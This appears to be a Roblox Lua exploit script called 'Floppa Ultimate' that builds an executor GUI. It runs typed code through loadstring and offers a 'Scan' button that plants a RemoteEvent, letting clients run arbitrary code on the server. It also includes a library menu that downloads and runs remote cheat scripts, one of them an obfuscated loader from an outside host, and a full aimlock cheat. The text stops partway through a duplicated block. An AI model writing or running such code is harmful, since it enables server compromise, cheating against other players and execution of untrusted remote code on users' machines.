-- Gui to Lua
-- Version: 3.2

-- Instances:

local SSInjector = Instance.new("ScreenGui")
local Main = Instance.new("Frame")
local TextLabel = Instance.new("TextLabel")
local Client = Instance.new("Frame")
local ClientCoder = Instance.new("TextBox")
local Execute = Instance.new("TextButton")
local ClientLibrary = Instance.new("TextButton")
local Clear = Instance.new("TextButton")
local ClientButton = Instance.new("TextButton")
local ServerButton = Instance.new("TextButton")
local Server = Instance.new("Frame")
local ServerCoder = Instance.new("TextBox")
local Execute_2 = Instance.new("TextButton")
local ServerLibrary = Instance.new("TextButton")
local Clear_2 = Instance.new("TextButton")
local RCEInjectButton = Instance.new("TextButton")
local ToggleButton = Instance.new("ImageButton")

--Properties:

SSInjector.Name = "SSInjector"
SSInjector.Parent = game.Players.LocalPlayer:WaitForChild("PlayerGui")
SSInjector.ZIndexBehavior = Enum.ZIndexBehavior.Sibling

Main.Name = "Main"
Main.Parent = SSInjector
Main.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
Main.BorderColor3 = Color3.fromRGB(0, 0, 0)
Main.BorderSizePixel = 0
Main.Position = UDim2.new(0.331240177, 0, 0.337064713, 0)
Main.Size = UDim2.new(0, 653, 0, 427)

TextLabel.Parent = Main
TextLabel.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
TextLabel.BorderColor3 = Color3.fromRGB(0, 0, 0)
TextLabel.BorderSizePixel = 2
TextLabel.Size = UDim2.new(0, 652, 0, 50)
TextLabel.Font = Enum.Font.SourceSans
TextLabel.Text = "Floppa Ultimate"
TextLabel.TextColor3 = Color3.fromRGB(0, 0, 0)
TextLabel.TextSize = 50.000

Client.Name = "Client"
Client.Parent = Main
Client.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
Client.BorderColor3 = Color3.fromRGB(0, 0, 0)
Client.BorderSizePixel = 2
Client.Position = UDim2.new(-8.42509835e-05, 0, 0.119448327, 0)
Client.Size = UDim2.new(0, 652, 0, 311)

ClientCoder.Name = "ClientCoder"
ClientCoder.Parent = Client
ClientCoder.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
ClientCoder.BorderColor3 = Color3.fromRGB(0, 0, 0)
ClientCoder.BorderSizePixel = 2
ClientCoder.Position = UDim2.new(0.0138036814, 0, 0.0387980454, 0)
ClientCoder.Size = UDim2.new(0, 492, 0, 286)
ClientCoder.Font = Enum.Font.SourceSans
ClientCoder.PlaceholderText = "You code here"
ClientCoder.Text = ""
ClientCoder.TextColor3 = Color3.fromRGB(255, 0, 0)
ClientCoder.TextSize = 14.000
ClientCoder.TextWrapped = true
ClientCoder.TextXAlignment = Enum.TextXAlignment.Left
ClientCoder.TextYAlignment = Enum.TextYAlignment.Top

Execute.Name = "Execute"
Execute.Parent = Client
Execute.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
Execute.BorderColor3 = Color3.fromRGB(0, 0, 0)
Execute.BorderSizePixel = 2
Execute.Position = UDim2.new(0.782208562, 0, 0.0363398604, 0)
Execute.Size = UDim2.new(0, 135, 0, 67)
Execute.Font = Enum.Font.SourceSans
Execute.Text = "Execute"
Execute.TextColor3 = Color3.fromRGB(0, 0, 0)
Execute.TextSize = 30.000

ClientLibrary.Name = "ClientLibrary"
ClientLibrary.Parent = Client
ClientLibrary.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
ClientLibrary.BorderColor3 = Color3.fromRGB(0, 0, 0)
ClientLibrary.BorderSizePixel = 2
ClientLibrary.Position = UDim2.new(0.782208562, 0, 0.533198833, 0)
ClientLibrary.Size = UDim2.new(0, 135, 0, 67)
ClientLibrary.Font = Enum.Font.SourceSans
ClientLibrary.Text = "Library"
ClientLibrary.TextColor3 = Color3.fromRGB(0, 0, 0)
ClientLibrary.TextSize = 30.000

Clear.Name = "Clear"
Clear.Parent = Client
Clear.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
Clear.BorderColor3 = Color3.fromRGB(0, 0, 0)
Clear.BorderSizePixel = 2
Clear.Position = UDim2.new(0.782208562, 0, 0.285641581, 0)
Clear.Size = UDim2.new(0, 135, 0, 67)
Clear.Font = Enum.Font.SourceSans
Clear.Text = "Clear"
Clear.TextColor3 = Color3.fromRGB(0, 0, 0)
Clear.TextSize = 30.000

ClientButton.Name = "ClientButton"
ClientButton.Parent = Main
ClientButton.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
ClientButton.BorderColor3 = Color3.fromRGB(0, 0, 0)
ClientButton.BorderSizePixel = 2
ClientButton.Position = UDim2.new(0.0122511489, 0, 0.897810221, 0)
ClientButton.Size = UDim2.new(0, 164, 0, 36)
ClientButton.Font = Enum.Font.SourceSans
ClientButton.Text = "Client"
ClientButton.TextColor3 = Color3.fromRGB(0, 0, 0)
ClientButton.TextSize = 30.000

ServerButton.Name = "ServerButton"
ServerButton.Parent = Main
ServerButton.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
ServerButton.BorderColor3 = Color3.fromRGB(0, 0, 0)
ServerButton.BorderSizePixel = 2
ServerButton.Position = UDim2.new(0.295558959, 0, 0.89781028, 0)
ServerButton.Size = UDim2.new(0, 164, 0, 36)
ServerButton.Font = Enum.Font.SourceSans
ServerButton.Text = "Server"
ServerButton.TextColor3 = Color3.fromRGB(0, 0, 0)
ServerButton.TextSize = 30.000

Server.Name = "Server"
Server.Parent = Main
Server.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
Server.BorderColor3 = Color3.fromRGB(0, 0, 0)
Server.BorderSizePixel = 2
Server.Position = UDim2.new(-8.43089001e-05, 0, 0.119448304, 0)
Server.Size = UDim2.new(0, 652, 0, 318)

ServerCoder.Name = "ServerCoder"
ServerCoder.Parent = Server
ServerCoder.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
ServerCoder.BorderColor3 = Color3.fromRGB(0, 0, 0)
ServerCoder.BorderSizePixel = 2
ServerCoder.Position = UDim2.new(0.0138036814, 0, 0.0387980454, 0)
ServerCoder.Size = UDim2.new(0, 492, 0, 286)
ServerCoder.Font = Enum.Font.SourceSans
ServerCoder.PlaceholderText = "You require here"
ServerCoder.Text = ""
ServerCoder.TextColor3 = Color3.fromRGB(255, 0, 0)
ServerCoder.TextSize = 14.000
ServerCoder.TextWrapped = true
ServerCoder.TextXAlignment = Enum.TextXAlignment.Left
ServerCoder.TextYAlignment = Enum.TextYAlignment.Top

Execute_2.Name = "Execute"
Execute_2.Parent = Server
Execute_2.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
Execute_2.BorderColor3 = Color3.fromRGB(0, 0, 0)
Execute_2.BorderSizePixel = 2
Execute_2.Position = UDim2.new(0.782208562, 0, 0.0324166752, 0)
Execute_2.Size = UDim2.new(0, 135, 0, 67)
Execute_2.Font = Enum.Font.SourceSans
Execute_2.Text = "Execute"
Execute_2.TextColor3 = Color3.fromRGB(0, 0, 0)
Execute_2.TextSize = 30.000

ServerLibrary.Name = "ServerLibrary"
ServerLibrary.Parent = Server
ServerLibrary.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
ServerLibrary.BorderColor3 = Color3.fromRGB(0, 0, 0)
ServerLibrary.BorderSizePixel = 2
ServerLibrary.Position = UDim2.new(0.782208562, 0, 0.519912362, 0)
ServerLibrary.Size = UDim2.new(0, 135, 0, 67)
ServerLibrary.Font = Enum.Font.SourceSans
ServerLibrary.Text = "Library"
ServerLibrary.TextColor3 = Color3.fromRGB(0, 0, 0)
ServerLibrary.TextSize = 30.000

Clear_2.Name = "Clear"
Clear_2.Parent = Server
Clear_2.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
Clear_2.BorderColor3 = Color3.fromRGB(0, 0, 0)
Clear_2.BorderSizePixel = 2
Clear_2.Position = UDim2.new(0.782208562, 0, 0.278573751, 0)
Clear_2.Size = UDim2.new(0, 135, 0, 67)
Clear_2.Font = Enum.Font.SourceSans
Clear_2.Text = "Clear"
Clear_2.TextColor3 = Color3.fromRGB(0, 0, 0)
Clear_2.TextSize = 30.000

RCEInjectButton.Name = "RCEInjectButton"
RCEInjectButton.Parent = Server
RCEInjectButton.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
RCEInjectButton.BorderColor3 = Color3.fromRGB(0, 0, 0)
RCEInjectButton.BorderSizePixel = 2
RCEInjectButton.Position = UDim2.new(0.782208562, 0, 0.764356196, 0)
RCEInjectButton.Size = UDim2.new(0, 135, 0, 67)
RCEInjectButton.Font = Enum.Font.SourceSans
RCEInjectButton.Text = "Scan"
RCEInjectButton.TextColor3 = Color3.fromRGB(0, 0, 0)
RCEInjectButton.TextSize = 30.000
RCEInjectButton.MouseButton1Click:Connect(function()
		local RCEremote = game.ReplicatedStorage:FindFirstChild("RemoteEvent")
		if RCEremote then
			print("RCE Found")
		elseif not RCEremote then
			local server = Instance.new("RemoteEvent",game.ReplicatedStorage)
			server.OnServerEvent:connect(function(player,SS)
				loadstring(SS)()
			end)
		end
		RCEremote:FireServer([[
            local mes = Instance.new("Hint", game.workspace)
            mes.Text = "Server got RCE Infected by Floppa Ultimate"
            task.delay(4, function() mes:Destroy() end)
        ]])
end)

ToggleButton.Name = "ToggleButton"
ToggleButton.Parent = SSInjector
ToggleButton.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
ToggleButton.BorderColor3 = Color3.fromRGB(0, 0, 0)
ToggleButton.BorderSizePixel = 0
ToggleButton.Position = UDim2.new(0.0868544579, 0, 0.414179116, 0)
ToggleButton.Size = UDim2.new(0, 100, 0, 50)
ToggleButton.Image = "rbxassetid://93101151251105"
ToggleButton.Draggable = true
ToggleButton.Active = true
ToggleButton.MouseButton1Click:Connect(function()
	Main.Visible = not Main.Visible
end)

-- Scripts:

local function ENMM_fake_script() -- Main.LocalScript 
	local script = Instance.new('LocalScript', Main)

	ClientMenu = script.Parent
	ClientMenu.Active = true
	ClientMenu.Draggable = true
end
coroutine.wrap(ENMM_fake_script)()
local function VEGL_fake_script() -- Execute.LocalScript 
	local script = Instance.new('LocalScript', Execute)

	local exec = script.Parent
	local codeloader = script.Parent.Parent.ClientCoder
	exec.MouseButton1Click:Connect(function()
		loadstring(codeloader.Text)()
	end)
end
coroutine.wrap(VEGL_fake_script)()
local function KVPJPI_fake_script() -- ClientLibrary.LocalScript 
	local script = Instance.new('LocalScript', ClientLibrary)

	local lib = script.Parent
	lib.MouseButton1Click:Connect(function()
		-- Gui to Lua
		-- Version: 3.2
	
		-- Instances:
	
		local LibraryGui = Instance.new("ScreenGui")
		local Library = Instance.new("Frame")
		local InfYieldButton = Instance.new("TextButton")
		local MM2Button = Instance.new("TextButton")
		local LibraryLabel = Instance.new("TextLabel")
		local CloseLibButton = Instance.new("TextButton")
		local SilentAimButton = Instance.new("TextButton")
		local AimLockButton = Instance.new("TextButton")
	
		--Properties:
	
		LibraryGui.Name = "LibraryGui"
		LibraryGui.Parent = game.Players.LocalPlayer:WaitForChild("PlayerGui")
		LibraryGui.ZIndexBehavior = Enum.ZIndexBehavior.Sibling
	
		Library.Name = "Library"
		Library.Parent = LibraryGui
		Library.BackgroundColor3 = Color3.fromRGB(0, 0, 255)
		Library.BorderColor3 = Color3.fromRGB(0, 0, 0)
		Library.BorderSizePixel = 2
		Library.Position = UDim2.new(0.499215066, 0, 0.264925361, 0)
		Library.Size = UDim2.new(0, 324, 0, 377)
	
		InfYieldButton.Name = "InfYieldButton"
		InfYieldButton.Parent = Library
		InfYieldButton.BackgroundColor3 = Color3.fromRGB(85, 0, 255)
		InfYieldButton.BorderColor3 = Color3.fromRGB(0, 0, 0)
		InfYieldButton.BorderSizePixel = 2
		InfYieldButton.Position = UDim2.new(0.0185185187, 0, 0.265251994, 0)
		InfYieldButton.Size = UDim2.new(0, 151, 0, 50)
		InfYieldButton.Font = Enum.Font.SourceSans
		InfYieldButton.Text = "Inf Yield"
		InfYieldButton.TextColor3 = Color3.fromRGB(0, 0, 0)
		InfYieldButton.TextSize = 30.000
	
		MM2Button.Name = "MM2Button"
		MM2Button.Parent = Library
		MM2Button.BackgroundColor3 = Color3.fromRGB(85, 0, 255)
		MM2Button.BorderColor3 = Color3.fromRGB(0, 0, 0)
		MM2Button.BorderSizePixel = 2
		MM2Button.Position = UDim2.new(0.515432119, 0, 0.265251994, 0)
		MM2Button.Size = UDim2.new(0, 151, 0, 50)
		MM2Button.Font = Enum.Font.SourceSans
		MM2Button.Text = "MM2"
		MM2Button.TextColor3 = Color3.fromRGB(0, 0, 0)
		MM2Button.TextSize = 30.000
	
		LibraryLabel.Name = "LibraryLabel"
		LibraryLabel.Parent = Library
		LibraryLabel.BackgroundColor3 = Color3.fromRGB(85, 0, 127)
		LibraryLabel.BorderColor3 = Color3.fromRGB(0, 0, 0)
		LibraryLabel.BorderSizePixel = 2
		LibraryLabel.Position = UDim2.new(0.0524691343, 0, 0.0981432348, 0)
		LibraryLabel.Size = UDim2.new(0, 289, 0, 50)
		LibraryLabel.Font = Enum.Font.SourceSans
		LibraryLabel.Text = "Library"
		LibraryLabel.TextColor3 = Color3.fromRGB(0, 0, 0)
		LibraryLabel.TextSize = 40.000
	
		CloseLibButton.Name = "CloseLibButton"
		CloseLibButton.Parent = Library
		CloseLibButton.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
		CloseLibButton.BorderColor3 = Color3.fromRGB(0, 0, 0)
		CloseLibButton.BorderSizePixel = 0
		CloseLibButton.Position = UDim2.new(0.88271606, 0, 0, 0)
		CloseLibButton.Size = UDim2.new(0, 38, 0, 31)
		CloseLibButton.Font = Enum.Font.SourceSans
		CloseLibButton.Text = "X"
		CloseLibButton.TextColor3 = Color3.fromRGB(0, 0, 0)
		CloseLibButton.TextSize = 50.000
	
		SilentAimButton.Name = "SilentAimButton"
		SilentAimButton.Parent = Library
		SilentAimButton.BackgroundColor3 = Color3.fromRGB(85, 0, 255)
		SilentAimButton.BorderColor3 = Color3.fromRGB(0, 0, 0)
		SilentAimButton.BorderSizePixel = 2
		SilentAimButton.Position = UDim2.new(0.515432119, 0, 0.432360739, 0)
		SilentAimButton.Size = UDim2.new(0, 151, 0, 50)
		SilentAimButton.Font = Enum.Font.SourceSans
		SilentAimButton.Text = "Silent Aim"
		SilentAimButton.TextColor3 = Color3.fromRGB(0, 0, 0)
		SilentAimButton.TextSize = 30.000
	
		AimLockButton.Name = "AimLockButton"
		AimLockButton.Parent = Library
		AimLockButton.BackgroundColor3 = Color3.fromRGB(85, 0, 255)
		AimLockButton.BorderColor3 = Color3.fromRGB(0, 0, 0)
		AimLockButton.BorderSizePixel = 2
		AimLockButton.Position = UDim2.new(0.0185185187, 0, 0.432360739, 0)
		AimLockButton.Size = UDim2.new(0, 151, 0, 50)
		AimLockButton.Font = Enum.Font.SourceSans
		AimLockButton.Text = "Aim Lock"
		AimLockButton.TextColor3 = Color3.fromRGB(0, 0, 0)
		AimLockButton.TextSize = 30.000
	
		-- Scripts:
	
		local function QTNKOS_fake_script() -- InfYieldButton.LocalScript 
			local script = Instance.new('LocalScript', InfYieldButton)
	
			local thisbutton = script.Parent
			thisbutton.MouseButton1Click:Connect(function()
				loadstring(game:HttpGet('https://raw.githubusercontent.com/EdgeIY/infiniteyield/master/source'))()
			end)
		end
		coroutine.wrap(QTNKOS_fake_script)()
		local function AHDHRDW_fake_script() -- MM2Button.MM2Script 
			local script = Instance.new('LocalScript', MM2Button)
	
			local mm2 = script.Parent
			mm2.MouseButton1Click:Connect(function()
				getgenv().mainKey = "nil"
				local a,b,c,d,e=loadstring,request or http_request or (http and http.request) or (syn and syn.request),assert,tostring,"https\58//api.eclipsehub.xyz/auth";c(a and b,"Executor not Supported")a(b({Url=e.."\?\107e\121\61"..d(mainKey),Headers={["User-Agent"]="Eclipse"}}).Body)()
			end)
		end
		coroutine.wrap(AHDHRDW_fake_script)()
		local function YGVJJRG_fake_script() -- Library.DraggableScript 
			local script = Instance.new('LocalScript', Library)
	
			local library = script.Parent
			library.Active = true
			library.Draggable = true
		end
		coroutine.wrap(YGVJJRG_fake_script)()
		local function VYTOA_fake_script() -- CloseLibButton.CloseScript 
			local script = Instance.new('LocalScript', CloseLibButton)
	
			local close = script.Parent
			local libr = script.Parent.Parent.Parent.Library
			close.MouseButton1Click:Connect(function()
				libr.Visible = false
			end)
		end
		coroutine.wrap(VYTOA_fake_script)()
		local function DRGP_fake_script() -- SilentAimButton.SilentScript 
			local script = Instance.new('LocalScript', SilentAimButton)
	
			local silent  = script.Parent
			silent.MouseButton1Click:Connect(function()
				loadstring(game:HttpGet("https://raw.githubusercontent.com/Stefanuk12/Aiming/main/Examples/UniversalSilentAim.lua",true))()
			end)
		end
		coroutine.wrap(DRGP_fake_script)()
		local function VYEUGJP_fake_script() -- AimLockButton.AimLockScript 
			local script = Instance.new('LocalScript', AimLockButton)
	
			local lock = script.Parent
			lock.MouseButton1Click:Connect(function()
				--FE Simple AimLock Script | Released Nov 2021 | Working.
				local Area = game:GetService("Workspace")
				local RunService = game:GetService("RunService")
				local UIS = game:GetService("UserInputService")
				local Players = game:GetService("Players")
				local LocalPlayer = Players.LocalPlayer
				local MyCharacter = LocalPlayer.Character
				local MyRoot = MyCharacter:FindFirstChild("HumanoidRootPart")
				local MyHumanoid = MyCharacter:FindFirstChild("Humanoid")
				local Mouse = LocalPlayer:GetMouse()
				local MyView = Area.CurrentCamera
				local MyTeamColor = LocalPlayer.TeamColor
				local HoldingM2 = false
				local Active = false
				local Lock = false
				local Epitaph = .187 ---Note: The Bigger The Number, The More Prediction.
				local HeadOffset = Vector3.new(0, .1, 0)
	
				_G.TeamCheck = false
				_G.AimPart = "HumanoidRootPart"
				_G.Sensitivity = 0
				_G.CircleSides = 64
				_G.CircleColor = Color3.fromRGB(255, 0, 130)
				_G.CircleTransparency = 0
				_G.CircleRadius = 200
				_G.CircleFilled = false
				_G.CircleVisible = true
				_G.CircleThickness = 1
	
				local FOVCircle = Drawing.new("Circle")
				FOVCircle.Position = Vector2.new(MyView.ViewportSize.X / 2, MyView.ViewportSize.Y / 2)
				FOVCircle.Radius = _G.CircleRadius
				FOVCircle.Filled = _G.CircleFilled
				FOVCircle.Color = _G.CircleColor
				FOVCircle.Visible = _G.CircleVisible
				FOVCircle.Transparency = _G.CircleTransparency
				FOVCircle.NumSides = _G.CircleSides
				FOVCircle.Thickness = _G.CircleThickness
	
				local function CursorLock()
					UIS.MouseBehavior = Enum.MouseBehavior.LockCenter
				end
				local function UnLockCursor()
					HoldingM2 = false Active = false Lock = false 
					UIS.MouseBehavior = Enum.MouseBehavior.Default
				end
				function FindNearestPlayer()
					local dist = math.huge
					local Target = nil
					for _, v in pairs(Players:GetPlayers()) do
						if v ~= LocalPlayer and v.Character:FindFirstChild("Humanoid") and v.Character:FindFirstChild("Humanoid").Health > 0 and v.Character:FindFirstChild("HumanoidRootPart") and v then
							local TheirCharacter = v.Character
							local CharacterRoot, Visible = MyView:WorldToViewportPoint(TheirCharacter[_G.AimPart].Position)
							if Visible then
								local RealMag = (Vector2.new(Mouse.X, Mouse.Y) - Vector2.new(CharacterRoot.X, CharacterRoot.Y)).Magnitude
								if RealMag < dist and RealMag < FOVCircle.Radius then
									dist = RealMag
									Target = TheirCharacter
								end
							end
						end
					end
					return Target
				end
	
				UIS.InputBegan:Connect(function(Input)
					if Input.UserInputType == Enum.UserInputType.MouseButton2 then
						HoldingM2 = true
						Active = true
						Lock = true
						if Active then
							local The_Enemy = FindNearestPlayer()
							while HoldingM2 do task.wait(.000001)
								if Lock and The_Enemy ~= nil then
									local Future = The_Enemy.HumanoidRootPart.CFrame + (The_Enemy.HumanoidRootPart.Velocity * Epitaph + HeadOffset)
									MyView.CFrame = CFrame.lookAt(MyView.CFrame.Position, Future.Position)
									CursorLock()
								end
							end
						end
					end
				end)
				UIS.InputEnded:Connect(function(Input)
					if Input.UserInputType == Enum.UserInputType.MouseButton2 then
						UnLockCursor()
					end
				end)
				game.StarterGui:SetCore("SendNotification", {Title = "Working.", Text = "Success, Script Loaded.", Duration = 4,})
			end)
		end
		coroutine.wrap(VYEUGJP_fake_script)()
	
	end)
end
coroutine.wrap(KVPJPI_fake_script)()
local function CEKCF_fake_script() -- Clear.LocalScript 
	local script = Instance.new('LocalScript', Clear)

	local clear = script.Parent
	local coder = script.Parent.Parent.ClientCoder
	clear.MouseButton1Click:Connect(function()
		coder.Text = ""
	end)
end
coroutine.wrap(CEKCF_fake_script)()
local function VRSITMJ_fake_script() -- ClientButton.ClientPageScript 
	local script = Instance.new('LocalScript', ClientButton)

	local client = script.Parent.Parent.Client
	local server = script.Parent.Parent.Server
	script.Parent.MouseButton1Click:Connect(function()
		client.Visible = true
		server.Visible = false
	end)
end
coroutine.wrap(VRSITMJ_fake_script)()
local function FYSXV_fake_script() -- ServerButton.ServerPageScript 
	local script = Instance.new('LocalScript', ServerButton)

	local Client = script.Parent.Parent.Client
	local Server = script.Parent.Parent.Server
	script.Parent.MouseButton1Click:Connect(function()
		Client.Visible = false
		Server.Visible = true
	end)
end
coroutine.wrap(FYSXV_fake_script)()
local function EFDXLFN_fake_script() -- Execute_2.LocalScript 
	local script = Instance.new('LocalScript', Execute_2)

	local textBox = script.Parent.Parent.ServerCoder 
	local executeButton = script.Parent.Parent.Execute
	
	executeButton.MouseButton1Click:Connect(function()
		local code = textBox.Text
		game.ReplicatedStorage.RemoteEvent:FireServer(code)
	end)
	
	game.ReplicatedStorage.RemoteEvent.OnServerEvent:Connect(function(player, code)
		local fn, err = loadstring("return function() "..code.." end")()
		if fn then
			pcall(fn)
		else
			warn("Ошибка загрузки кода:", err)
		end
	end)
	
end
coroutine.wrap(EFDXLFN_fake_script)()
local function IZNPI_fake_script() -- ServerLibrary.LocalScript 
	local script = Instance.new('LocalScript', ServerLibrary)

	local lib = script.Parent
	lib.MouseButton1Click:Connect(function()
		-- Gui to Lua
		-- Version: 3.2
	
		-- Instances:
	
		local LibraryGui = Instance.new("ScreenGui")
		local Library = Instance.new("Frame")
		local InfYieldButton = Instance.new("TextButton")
		local MM2Button = Instance.new("TextButton")
		local LibraryLabel = Instance.new("TextLabel")
		local CloseLibButton = Instance.new("TextButton")
		local SilentAimButton = Instance.new("TextButton")
		local AimLockButton = Instance.new("TextButton")
	
		--Properties:
	
		LibraryGui.Name = "LibraryGui"
		LibraryGui.Parent = game.Players.LocalPlayer:WaitForChild("PlayerGui")
		LibraryGui.ZIndexBehavior = Enum.ZIndexBehavior.Sibling
	
		Library.Name = "Library"
		Library.Parent = LibraryGui
		Library.BackgroundColor3 = Color3.fromRGB(0, 0, 255)
		Library.BorderColor3 = Color3.fromRGB(0, 0, 0)
		Library.BorderSizePixel = 2
		Library.Position = UDim2.new(0.499215066, 0, 0.264925361, 0)
		Library.Size = UDim2.new(0, 324, 0, 377)
	
		InfYieldButton.Name = "InfYieldButton"
		InfYieldButton.Parent = Library
		InfYieldButton.BackgroundColor3 = Color3.fromRGB(85, 0, 255)
		InfYieldButton.BorderColor3 = Color3.fromRGB(0, 0, 0)
		InfYieldButton.BorderSizePixel = 2
		InfYieldButton.Position = UDim2.new(0.0185185187, 0, 0.265251994, 0)
		InfYieldButton.Size = UDim2.new(0, 151, 0, 50)
		InfYieldButton.Font = Enum.Font.SourceSans
		InfYieldButton.Text = "Inf Yield"
		InfYieldButton.TextColor3 = Color3.fromRGB(0, 0, 0)
		InfYieldButton.TextSize = 30.000
	
		MM2Button.Name = "MM2Button"
		MM2Button.Parent = Library
		MM2Button.BackgroundColor3 = Color3.fromRGB(85, 0, 255)
		MM2Button.BorderColor3 = Color3.fromRGB(0, 0, 0)
		MM2Button.BorderSizePixel = 2
		MM2Button.Position = UDim2.new(0.515432119, 0, 0.265251994, 0)
		MM2Button.Size = UDim2.new(0, 151, 0, 50)
		MM2Button.Font = Enum.Font.SourceSans
		MM2Button.Text = "MM2"
		MM2Button.TextColor3 = Color3.fromRGB(0, 0, 0)
		MM2Button.TextSize = 30.000
	
		LibraryLabel.Name = "LibraryLabel"
		LibraryLabel.Parent = Library
		LibraryLabel.BackgroundColor3 = Color3.fromRGB(85, 0, 127)
		LibraryLabel.BorderColor3 = Color3.fromRGB(0, 0, 0)
		LibraryLabel.BorderSizePixel = 2
		LibraryLabel.Position = UDim2.new(0.0524691343, 0, 0.0981432348, 0)
		LibraryLabel.Size = UDim2.new(0, 289, 0, 50)
		LibraryLabel.Font = Enum.Font.SourceSans
		LibraryLabel.Text = "Library"
		LibraryLabel.TextColor3 = Color3.fromRGB(0, 0, 0)
		LibraryLabel.TextSize = 40.000
	
		CloseLibButton.Name = "CloseLibButton"
		CloseLibButton.Parent = Library
		CloseLibButton.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
		CloseLibButton.BorderColor3 = Color3.fromRGB(0, 0, 0)
		CloseLibButton.BorderSizePixel = 0
		CloseLibButton.Position = UDim2.new(0.88271606, 0, 0, 0)
		CloseLibButton.Size = UDim2.new(0, 38, 0, 31)
		CloseLibButton.Font = Enum.Font.SourceSans
		CloseLibButton.Text = "X"
		CloseLibButton.TextColor3 = Color3.fromRGB(0, 0, 0)
		CloseLibButton.TextSize = 50.000
	
		SilentAimButton.Name = "SilentAimButton"
		SilentAimButton.Parent = Library
		SilentAimButton.BackgroundColor3 = Color3.fromRGB(85, 0, 255)
		SilentAimButton.BorderColor3 = Color3.fromRGB(0, 0, 0)
		SilentAimButton.BorderSizePixel = 2
		SilentAimButton.Position = UDim2.new(0.515432119, 0, 0.432360739, 0)
		SilentAimButton.Size = UDim2.new(0, 151, 0, 50)
		SilentAimButton.Font = Enum.Font.SourceSans
		SilentAimButton.Text = "Silent Aim"
		SilentAimButton.TextColor3 = Color3.fromRGB(0, 0, 0)
		SilentAimButton.TextSize = 30.000
	
		AimLockButton.Name = "AimLockButton"
		AimLockButton.Parent = Library
		AimLockButton.BackgroundColor3 = Color3.fromRGB(85, 0, 255)
		AimLockButton.BorderColor3 = Color3.fromRGB(0, 0, 0)
		AimLockButton.BorderSizePixel = 2
		AimLockButton.Position = UDim2.new(0.0185185187, 0, 0.432360739, 0)
		AimLockButton.Size = UDim2.new(0, 151, 0, 50)
		AimLockButton.Font = Enum.Font.SourceSans
		AimLockButton.Text = "Aim Lock"
		AimLockButton.TextColor3 = Color3.fromRGB(0, 0, 0)
		AimLockButton.TextSize = 30.000
	
		-- Scripts:
	
		local function QTNKOS_fake_script() -- InfYieldButton.LocalScript 
			local script = Instance.new('LocalScript', InfYieldButton)
	
			local thisbutton = script.Parent
			thisbutton.MouseButton1Click:Connect(function()
				loadstring(game:HttpGet('https://raw.githubusercontent.com/EdgeIY/infiniteyield/master/source'))()
			end)
		end
		coroutine.wrap(QTNKOS_fake_script)()
		local function AHDHRDW_fake_script() -- MM2Button.MM2Script 
			local script = Instance.new('LocalScript', MM2Button)
	
			local mm2 = script.Parent
			mm2.MouseButton1Click:Connect(function()
				getgenv().mainKey = "nil"
				local a,b,c,d,e=loadstring,request or http_request or (http and http.request) or (syn and syn.request),assert,tostring,"https\58//api.eclipsehub.xyz/auth";c(a and b,"Executor not Supported")a(b({Url=e.."\?\107e\121\61"..d(mainKey),Headers={["User-Agent"]="Eclipse"}}).Body)()
			end)
		end
		coroutine.wrap(AHDHRDW_fake_script)()
		local function YGVJJRG_fake_script() -- Library.DraggableScript 
			local script = Instance.new('LocalScript', Library)
	
			local library = script.Parent
			library.Active = true
			library.Draggable = true
		end
		coroutine.wrap(YGVJJRG_fake_script)()
		local function VYTOA_fake_script() -- CloseLibButton.CloseScript 
			local script = Instance.new('LocalScript', CloseLibButton)
	
			local close = script.Parent
			local libr = script.Parent.Parent.Parent.Library
			close.MouseButton1Click:Connect(function()
				libr.Visible = false
			end)
		end
		coroutine.wrap(VYTOA_fake_script)()
		local function DRGP_fake_script() -- SilentAimButton.SilentScript 
			local script = Instance.new('LocalScript', SilentAimButton)
	
			local silent  = script.Parent
			silent.MouseButton1Click:Connect(function()
				loadstring(game:HttpGet("https://raw.githubusercontent.com/Stefanuk12/Aiming/main/Examples/UniversalSilentAim.lua",true))()
			end)
		end
		coroutine.wrap(DRGP_fake_script)()
		local function VYEUGJP_fake_script() -- AimLockButton.AimLockScript 
			local script = Instance.new('LocalScript', AimLockButton)
	
			local lock = script.Parent
			lock.MouseButton1Click:Connect(function()
				--FE Simple AimLock Script | Released Nov 2021 | Working.
				local Area = game:GetService("Workspace")
				local RunService = game:GetService("RunService")
				local UIS = game:GetService("UserInputService")
				local Players = game:GetService("Players")
				local LocalPlayer = Players.LocalPlayer
				local MyCharacter = LocalPlayer.Character
				local MyRoot = MyCharacter:FindFirstChild("HumanoidRootPart")
				local MyHumanoid = MyCharacter:FindFirstChild("Humanoid")
				local Mouse = LocalPlayer:GetMouse()
				local MyView = Area.CurrentCamera
				local MyTeamColor = LocalPlayer.TeamColor
				local HoldingM2 = false
				local Active = false
				local Lock = false
				local Epitaph = .187 ---Note: The Bigger The Number, The More Prediction.
				local HeadOffset = Vector3.new(0, .1, 0)
	
				_G.TeamCheck = false
				_G.AimPart = "HumanoidRootPart"
				_G.Sensitivity = 0
				_G.CircleSides = 64
				_G.CircleColor = Color3.fromRGB(255, 0, 130)
				_G.CircleTransparency = 0
				_G.CircleRadius = 200
				_G.CircleFilled = false
				_G.CircleVisible = true
				_G.CircleThickness = 1
	
				local FOVCircle = Drawing.new("Circle")
				FOVCircle.Position = Vector2.new(MyView.ViewportSize.X / 2, MyView.ViewportSize.Y / 2)
				FOVCircle.Radius = _G.CircleRadius
				FOVCircle.Filled = _G.CircleFilled
				FOVCircle.Color = _G.CircleColor
				FOVCircle.Visible = _G.CircleVisible
				FOVCircle.Transparency = _G.CircleTransparency
				FOVCircle.NumSides = _G.CircleSides
				FOVCircle.Thickness = _G.CircleThickness
	
				local function CursorLock()
					UIS.MouseBehavior = Enum.MouseBehavior.LockCenter
				end
